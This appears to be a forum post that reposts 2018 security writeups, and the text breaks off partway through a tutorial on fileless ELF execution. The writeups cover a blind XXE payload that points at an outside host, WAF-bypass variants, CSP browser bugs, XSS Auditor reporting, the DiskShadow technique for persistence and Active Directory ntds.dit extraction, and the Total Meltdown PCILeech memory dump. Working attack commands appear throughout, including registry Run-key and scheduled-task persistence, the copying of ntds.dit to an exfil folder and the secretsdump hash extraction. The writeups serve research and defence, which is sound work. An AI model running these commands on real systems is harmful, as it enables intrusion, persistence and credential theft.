<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

Sursa: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
  7. Stefan Matsson 2018-03-26 # Security
CSP IMPLEMENTATIONS ARE BROKEN
TL;DR
frame-src is inconsistent cross browser
block-all-mixed-content is broken in Chrome and Opera
CSP reports are inconsistent
Edge has some weird edge cases (no pun intended)
INTRO
There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud got infected by a cryptominer and forced the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue as it contains rules for what the browser may and may not load. Read more at https://content-security-policy.com
I recently held a talk with the title “Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it”. This talk was based on my work at my current client. This post is sort of a summary of that talk and will outline some of the issues we found in different browsers and with different combinations of devices, OSs, browsers, extensions and whatnot.
SOME INFO ON THE SYSTEM WE ARE BUILDING
My client provides payment services for e-commerce. The system will be loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features in CSP that require us to use CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let’s call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literally hundreds of trusted providers all over the world and each of these has its own page that must be loaded in the iframe. I will not go into more detail, so as not to reveal too much information about my client.
FRAME-SRC IS INCONSISTENT CROSS BROWSER
If your CSP contains a frame-src that does not contain mailto: or tel: these links will be blocked inside the iframe except in Firefox and Edge.
Firefox will open both links and Edge will open the mailto link but block the tel link. I’m not really sure if it’s broken in Firefox or in the other browsers. There are valid arguments for both cases.
Workaround: Add mailto: and tel: to your CSP:
frame-src 'self' mailto: tel:
I have reported this to Microsoft but have not heard back.
Affected browsers: Firefox and Edge or all others depending on your point of view
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/
EDGE AND CUSTOM ERROR PAGES
We load an iframe from a trusted service provider which in turn redirects to different sites depending on circumstances. As we cannot know what URLs will be redirected to we currently use this frame-src in our CSP:
frame-src 'self' data: https:
The issue with Edge is that it will load custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc). The error page is loaded via a ms-appx-web:// url (e.g. ms-appx-web:///assets/errorpages/http_500.htm) which is blocked by the CSP and a blank page is displayed to the user. The result is that our service provider’s iframe is just blank if an error occurs. I reported this issue to Microsoft in early March but have not heard anything back from them.
Workaround: Add ms-appx-web: to our frame-src:
frame-src 'self' data: https: ms-appx-web:
Affected browsers: Edge
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/
EDGE AND EXTENSIONS
Extensions installed in Edge are subject to the current page’s content security policy. Basically all installed extensions that try to do anything from loading images to JS will fail and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released according to the Edge issue tracker (issue 1132012).
Affected browsers: Edge
BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE
If you serve your site using HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site using HTTP. If the user tries to click a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors:
Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS.
Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS.
This issue has been reported to Google and Opera. Opera has not yet responded.
Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead)
Affected browsers: Chrome and Opera
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/
SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2
“Older” in this case meaning iOS 9 or earlier. Safari on iOS 10 and 11 does support CSP2. Since we require the use of script hashes we also require CSP2. Desktop Safari is also affected, but this is not as big of a problem as most desktops are up to date. Current usage on our site is less than 0.9% for older Safari on desktop.
Workaround: There is no way to make this work so we have disabled CSP for older iOS devices using user agent sniffing.
Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop
INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1
IE11 supports CSP1 using the X-Content-Security-Policy header.
If you wish to support IE11 you need to either do some user agent sniffing and change the header from Content-Security-Policy to X-Content-Security-Policy or send out both headers for everyone. In our case we barely have any customers on IE11 so we just send out the regular Content-Security-Policy header which is then ignored by IE11.
Affected browsers: Internet Explorer 11 (older versions do not support CSP)
CSP REPORTS DIFFER BETWEEN BROWSERS
The reports sent to your report-uri should follow a common standard defined in the CSP spec but browsers differ on what data they send.
Some versions of Safari include the entire CSP in the violated-directive property. This is like saying “Something went wrong. You find out what and deal with it.”
Chrome on Android sometimes does not provide a blocked-uri when the violated-directive is frame-src. This means that we have no way of knowing what URL was blocked in the iframe.
Most browsers do not provide a script-sample when an inline script is blocked. script-sample is very helpful in debugging what script was blocked.
CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES
This is primarily due to browser extensions. Most extensions work by injecting code on the page, and code on the page is subject to the page’s CSP. A common issue we have found in our logs is violated-directive: script-src blocked-uri: about:blank which is caused by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank.
SUMMARY
Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site.
Sursa: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/
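The frame-src workarounds and the IE11 header switch described in the CSP post above can be combined in a small server-side helper. The following Python sketch is only an illustration under stated assumptions: the function names are hypothetical, the directive set is an example rather than the author's real policy, and detecting IE11 by the "Trident/7.0" token in the user agent is a common heuristic, not something the post specifies.

```python
from typing import Dict, List


def build_csp(directives: Dict[str, List[str]]) -> str:
    """Serialise a mapping of directive name -> source list into a CSP string."""
    parts = []
    for name, sources in directives.items():
        # A directive without sources (e.g. upgrade-insecure-requests) is just its name.
        parts.append(" ".join([name, *sources]))
    return "; ".join(parts)


def csp_header_for(user_agent: str, policy: str) -> Dict[str, str]:
    """Pick the header name by user agent (assumption: IE11 sends 'Trident/7.0')."""
    if "Trident/7.0" in user_agent:
        return {"X-Content-Security-Policy": policy}
    return {"Content-Security-Policy": policy}


# Example policy: the post's frame-src plus the ms-appx-web:, mailto: and tel: workarounds.
EXAMPLE_POLICY = build_csp({
    "default-src": ["'self'"],
    "frame-src": ["'self'", "data:", "https:", "ms-appx-web:", "mailto:", "tel:"],
})

if __name__ == "__main__":
    print(csp_header_for("Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
                         EXAMPLE_POLICY))
```

Note that IE11 only understands CSP1, so a policy that relies on CSP2 features such as script hashes may still need to be trimmed before being sent under the legacy header name.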
  8. Introducing XSS Auditor reporting to Report URI
March 26, 2018
Whilst we already have support for CSP reports over at Report URI, there is another potential source of information about XSS attacks that may be attempted or happening on your site. The X-XSS-Protection header allows you to configure the XSS Auditor, decide what action it should take and request that the auditor send reports if action is required. We now support XSS Auditor reporting on Report URI!
The XSS Auditor
The XSS Auditor runs whilst HTML is being parsed and attempts to find reflected XSS attacks against the user. If it finds a possible attack the Auditor can take no action, it can filter what it thinks is the attack payload or it can refuse to render the page at all. You can find more details about the XSS Auditor, which is present in Chromium and WebKit, so there is a good share of browsers that have one.
Configuring the Auditor
The default configuration for the XSS Auditor varies depending on which version of which browser you're using, of course, but configuring it is easy enough. You can control the auditor with the X-Xss-Protection header with a few simple values. You can read more detail about configuring the auditor in my blog post Hardening your HTTP response headers and you can test to see if your site, or any other site, has it deployed properly using securityheaders.io. No matter which configuration you use, as long as you have the auditor enabled, it can send reports about the action it takes.
X-Xss-Protection: 1; mode=block; report=https://{subdomain}.report-uri.com/r/d/xss/enforce
XSS Reports
Whilst the original purpose of CSP was to defend against XSS attacks, and it can do that very successfully, if you have both CSP and XXP (X-Xss-Protection) deployed you can benefit from an even better level of protection. There's no reason to think you don't need one if you have the other, leverage the protection of both!
Whether you do or don't have CSP deployed, you can deploy XXP and have the Auditor stop attacks before they even take place. If CSP is a last line of defence in the browser then XXP is an additional, penultimate line of defence. With the auditor configured, if it sees any kind of reflected XSS attack on your site it will send a report that looks like this.
{ "xss-report": { "request-url": "https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/?search=%3Cscript%3Ealert(123);%3C/script%3E", "request-body": "" } }
This is a great report to receive and it will tip you off about a likely issue on one of your pages. The good thing about the report is that it won't be sent if the browser doesn't find the content of the GET parameter reflected somewhere in the page, so the false positive rate should be fairly low. You might see some novel attacks against your users, find some nifty XSS payloads or just rest assured knowing that if the browser thinks there's a problem then it will tell you. Deploy it alongside CSP, before CSP or after CSP, it doesn't really matter, but it's available now and you should go check it out.
Support
The XSS Auditor can send reports from Chromium and WebKit based browsers which gives us a pretty high level of visibility. WebKit will happily send those reports right now but Chrome does have a small interruption in service at present. You can read more in the Chromium Bug but Chrome will begin sending reports again during April, so we will be back on track there. The great thing about reporting mechanisms like this is that we can still get value from the feature even without 100% browser support. There are a lot of WebKit browsers out there and they may be able to tell you something useful.
Other Updates
We've also released a few other features here and there over the last couple of months so I wanted to detail those too.
The list is far from exhaustive but here are a few:
When filtering your reports on the Reports page, the filter is now reflected into the URL. This means you can bookmark/share/save filters for more convenient use in the future. Back/forward navigation also works as expected.
After the recent update that introduced wildcard queries in the hostname and path fields, we've also introduced a 'not' filter that does exactly what you'd expect.
We've made some improvements to our filtering for inbound reports. There's now less noise making it through to your account and we have special handling in place for a few browser bugs so reports will make more sense overall.
There have been countless UI tweaks and improvements to make the browsing experience better including series highlighting and toggling on the graphs page, better sorting on the Reports tables, Team invite emails, performance improvements and much more!
After launching XSS Auditor Reporting today we've started our 7 day countdown to our next feature launch which is going to be a big one. I'm really excited about the launch next week and I'm hoping everyone will love the new feature as much as we do!
Sursa: https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/
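If you receive XSS Auditor reports at your own endpoint rather than a hosted service, the report format shown in the post above is simple to triage. The Python sketch below is an assumption-laden illustration: the function name and the shape of the returned summary are hypothetical, and it assumes the report body is the JSON object with an "xss-report" key containing "request-url" and "request-body", as in the post's sample.

```python
import json
from urllib.parse import parse_qsl, urlsplit


def summarize_xss_report(raw: str) -> dict:
    """Extract the host, path and decoded query parameters from one report body."""
    report = json.loads(raw)["xss-report"]
    url = urlsplit(report["request-url"])
    return {
        "host": url.netloc,
        "path": url.path,
        # Decoded parameters make the reflected payload easy to spot in logs.
        "params": dict(parse_qsl(url.query)),
        "body": report.get("request-body", ""),
    }


if __name__ == "__main__":
    sample = json.dumps({
        "xss-report": {
            "request-url": "https://example.com/search/?q=%3Cscript%3Ealert(1)%3C/script%3E",
            "request-body": "",
        }
    })
    print(summarize_xss_report(sample))
```

Grouping summaries by host and path gives a quick view of which pages are reflecting input, which is usually the first thing you want to know from these reports.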
  9. DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction MARCH 26, 2018 ~ BOHOPS [Source: blog.microsoft.com] Introduction Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement – DiskShadow.exe. In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations. *Don’t mind the ridiculous title – it just seemed thematic What is DiskShadow? “DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.“ – Microsoft Docs DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation), however, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence. DiskShadow Command Execution As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file. 
Let’s demonstrate each of these capabilities:
Note: The following example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.
Interactive Mode
In the following example, a normal user invokes calc.exe:
Script Mode
In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt:
diskshadow.exe /s c:\test\diskshadow.txt
Like Vshadow, take note that DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing.
Auto-Start Persistence & Evasion
Since DiskShadow is a Windows signed binary, let’s take a look at a few AutoRuns implications for persistence and evasion. In the following examples, we will update our script then create a RunKey and Scheduled Task.
Preparation
Since DiskShadow is “window forward” (e.g. pops a command window), we will need to modify our script in a way to invoke proof-of-concept pass-thru execution and close the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is opened for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time.
Note: The following example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.
First, let’s modify our script (diskshadow.txt) to demonstrate this basic technique: EXEC "cmd.exe" /c c:\test\evil.exe *In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode. Second, let’s add persistence with the following commands: - Run Key Value - reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt" - User Level Scheduled Task - schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt" Let’s take a further look at these… AutoRuns – Run Key Value After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows signed executables are hidden from view (with a few notable exceptions) as demonstrated in this screenshot: After de-selecting “Hide Windows Entries”, we can see the AutoRuns entry: AutoRuns – Scheduled Tasks Like the Run Key method, we can see that our entry is hidden in the default AutoRuns view: After de-selecting “Hide Windows Entries”, we can see AutoRuns entry: Extracting the Active Directory Database Since we are discussing the usage of a shadow copy tool, let’s move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database – ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and are running DiskShadow under a privileged context in Script Mode. First, let’s prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that ‘contains’ the AD database) to shadow as well as discovered a logical drive letter that is not in use on the system. 
Here is the DiskShadow script (diskshadow.txt):
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
[Helpful Source: DataCore]
In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we will extract to the ‘exfil’ directory before deleting our shadow copy identified by someAlias.
*Note: We can attempt to copy out the target file by specifying a shadow device name /unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode.
The commands and results of the DiskShadow operation are presented in this screenshot:
type c:\diskshadow.txt
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
In addition to the AD database, we will also need to extract the SYSTEM registry hive:
reg.exe save hklm\system c:\exfil\system.bak
After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM Hashes:
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Success! We have used another method to extract the AD database and hashes. Now, let’s compare and contrast DiskShadow and Vshadow…
DiskShadow vs. Vshadow
DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let’s explore some of these in greater detail:
Operating System Inclusion
DiskShadow.exe is included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK.
Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a “living off the land” scenario, DiskShadow.exe has the clear advantage. Utility & Usage Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support as previously described. DiskShadow.exe has the advantage here. Command Line Orientation Vshadow is “command line friendly” while DiskShadow requires use by interactive prompt or script file. Unless you have (remote) “TTY” access to a target machine, DiskShadow’s interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk for detection when creating files or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although, creating a text file will likely have less impact than uploading a binary – refer to the previous section). AutoRuns Persistence & Evasion In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the Default View since Microsoft signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage. Active Directory Database Extraction If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit. 
This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here. Conclusion All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons. For DiskShadow, Blue Teams and Network Defenders should consider the following: Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit). Monitor for suspicious instances of System Event ID 7036 (“The Volume Shadow Copy service entered the running state”) and invocation of the VSSVC.exe process. Monitor process creation events for diskshadow.exe and spawned child processes. Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag. Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems. Monitor for new and interesting logical drive mappings. Inspect suspicious “AutoRuns” entries. Scrutinize signed binaries and inspect script files. Enforce Application Whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing. Fight the good fight, and train your users. If they see something (e.g. a weird pop up window), they should say something! As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow! Sursa: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
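Several of the defensive recommendations in the DiskShadow post above (watch for child processes of diskshadow.exe, script-mode invocations, and medium-integrity runs) can be expressed as a simple filter over process-creation telemetry. The Python sketch below is illustrative only: the event dictionary keys (image, parent_image, command_line, integrity) are hypothetical names loosely modelled on typical process-creation logs, so map them to whatever your logging pipeline actually emits.

```python
def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def flag_diskshadow_events(events):
    """Return (reason, event) pairs for process-creation events worth reviewing."""
    findings = []
    for ev in events:
        image = _basename(ev.get("image", ""))
        parent = _basename(ev.get("parent_image", ""))
        cmdline = ev.get("command_line", "").lower()
        integrity = ev.get("integrity", "").lower()

        if parent == "diskshadow.exe":
            # EXEC pass-thru: DiskShadow is the parent of the spawned payload.
            findings.append(("child-of-diskshadow", ev))
        elif image == "diskshadow.exe" and integrity == "medium":
            # VSS operations need elevation, so a medium-integrity run is suspicious.
            findings.append(("medium-integrity-diskshadow", ev))
        elif image == "diskshadow.exe" and "/s " in cmdline:
            # Script mode, as used for the persistence and ntds.dit examples.
            findings.append(("script-mode-diskshadow", ev))
    return findings


if __name__ == "__main__":
    sample = [{
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\System32\diskshadow.exe",
        "command_line": r"cmd.exe /c c:\test\evil.exe",
        "integrity": "Medium",
    }]
    for reason, event in flag_diskshadow_events(sample):
        print(reason, event["command_line"])
```

A filter like this is a starting point for alerting, not a complete detection: legitimate backup jobs also run diskshadow.exe in script mode, so expect to tune it per environment.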
  10. Total Meltdown?

Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per second was not a good thing. Meet the Windows 7 Meltdown patch from January. It stopped Meltdown but opened up a vulnerability way worse ... It allowed any process to read the complete memory contents at gigabytes per second, oh - it was possible to write to arbitrary memory as well. No fancy exploits were needed. Windows 7 already did the hard work of mapping the required memory into every running process. Exploitation was just a matter of reading and writing already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write!

Accessing memory at over 4GB/s, dumping to disk is slower due to disk transfer speeds.

How is this possible?

In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself. The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM. For more in-depth information about paging please have a look at Getting Physical: Extreme abuse of Intel based Paging Systems - Part 1 and Part 2.

PML4 self-referencing entry at offset 0xF68 with value 0x0000000062100867.

Windows has a special entry in this topmost PML4 page table that references itself, a self-referencing entry. In Windows 7 the PML4 self-referencing entry is fixed at position 0x1ED, offset 0xF68 (it is randomized in Windows 10). This means that the PML4 will always be mapped at the address 0xFFFFF6FB7DBED000 in virtual memory. This is normally a memory address only made available to the kernel (Supervisor).
Since the permission bit was erroneously set to User this meant the PML4 was mapped into every process and made available to code executing in user-mode. "kernel address" memory addresses mapped in every process as user-mode read/write pages. Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one has to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory. The last '7' in the PML4e 0x0000000062100867 (from above example) indicates that bits 0, 1, 2 are set, which means it's Present, Writable and User-mode accessible as per the description in the Intel Manual. Excerpt from the Intel Manual, if bit 2 is set to '1' user-mode access are permitted. Can I try this out myself? Yes absolutely. The technique has been added as a memory acquisition device to the PCILeech direct memory access attack toolkit. Just download PCILeech and execute it with device type: -device totalmeltdown on a vulnerable Windows 7 system. Dump memory to file with the command: pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force . If you have the Dokany file system driver installed you should be able to mount the running processes as files and folders in the Memory Process File System - with the virtual memory of the kernel and the processes as read/write. To mount the processes issue the command: pcileech.exe mount -device totalmeltdown . Please remember to re-install your security updates if you temporarily uninstall the latest one in order to test this vulnerability. A vulnerable system is "exploited" and the running processes are mounted with PCILeech. Process memory maps and PML4 are accessed. Is my system vulnerable? Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are vulnerable. 
If your system hasn't been patched since December 2017, or if it's patched with the 2018-03-29 patches or later, it will be secure. Other Windows versions, such as Windows 10 or 8.1, are completely secure with regard to this issue and have never been affected by it.

Other

I discovered this vulnerability just after it had been patched in the 2018-03 Patch Tuesday. I have not been able to correlate the vulnerability to known CVEs or other known issues.

Updates

Windows 2008R2 was vulnerable as well. OOB security update released to fully resolve the vulnerability on 2018-03-29. CVE-2018-1038. Apply immediately if affected!

Timeline

2018-03-xx--25: Issue identified in Windows 7 x64. Issue seemed to be patched already. PoC coded. Contacted MSRC with technical description asking if OK to publish a blog entry or if I should hold off publication.
2018-03-26: Green light given by MSRC for me to publish blog entry.
2018-03-27: Published blog entry and PoC.
2018-03-28: Found out that the March patches only partially resolved the vulnerability. Contacted MSRC again.
2018-03-29: OOB security update released by Microsoft. CVE-2018-1038. Apply immediately if affected!

Huge Thank You to everyone at Microsoft that worked hard to resolve this issue. It is super impressive to be able to roll out a complex kernel update in little over a day. It was never my intention to release a fairly potent kernel 0-day publicly. I hope the above timeline explains how this could happen.

Source: https://blog.frizk.net/2018/03/total-meltdown.html?m=1
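The numbers quoted in the Total Meltdown post above can be checked with a little arithmetic. The following is a minimal sketch, assuming standard x86-64 4-level paging (9 index bits per level, 8-byte entries, canonical sign extension from bit 47); the function names are made up for illustration and are not part of PCILeech.

```python
def self_ref_va(index: int) -> int:
    """Virtual address at which the PML4 maps itself for a given self-referencing slot."""
    va = 0
    # Using the same index at all four levels makes the MMU walk back into the PML4.
    for shift in (39, 30, 21, 12):
        va |= index << shift
    # Canonical addresses replicate bit 47 into bits 48..63.
    if va & (1 << 47):
        va |= 0xFFFF << 48
    return va


def decode_entry(entry: int) -> dict:
    """Decode the low permission bits and the physical frame of a page table entry."""
    return {
        "present": bool(entry & 0x1),   # bit 0
        "writable": bool(entry & 0x2),  # bit 1
        "user": bool(entry & 0x4),      # bit 2: user-mode access permitted
        "phys": entry & 0x000FFFFFFFFFF000,  # bits 12..51
    }


print(hex(0x1ED * 8))                    # byte offset of slot 0x1ED in the PML4
print(hex(self_ref_va(0x1ED)))           # where Windows 7 maps the PML4
print(decode_entry(0x0000000062100867))  # the entry value quoted in the post
```

With slot 0x1ED this reproduces offset 0xF68 and address 0xFFFFF6FB7DBED000, and the quoted entry decodes as Present, Writable and User, which is exactly the problem the post describes.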
  11. In-Memory-Only ELF Execution (Without tmpfs) 10 minute read CONTENTS INTRODUCTION CAVEATS ON TARGET MEMFD_CREATE(2) WRITE(2) OPTIONAL: FORK(2) EXECVE(2) SCRIPTING IT ARTIFACTS DEMO TL;DR In which we run a normal ELF binary on Linux without touching the filesystem (except /proc). Introduction Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process? Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary. The manpage has the following to say on the subject of naming anonymous files: The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects. In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name. 
Listing /proc/<PID>/fd, anonymous files look like this:

    stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
    total 0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
    lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2) from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to achieve fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

    stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
    4.4.0-116-generic

On Target

Aside from execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file.
We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we’re using Perl’s syscall() to call memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

    stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
    asm-generic/unistd.h:#define __NR_memfd_create 279
    asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
    linux/memfd.h:#define MFD_CLOEXEC 0x0001U
    x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
    x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
    x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
    x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
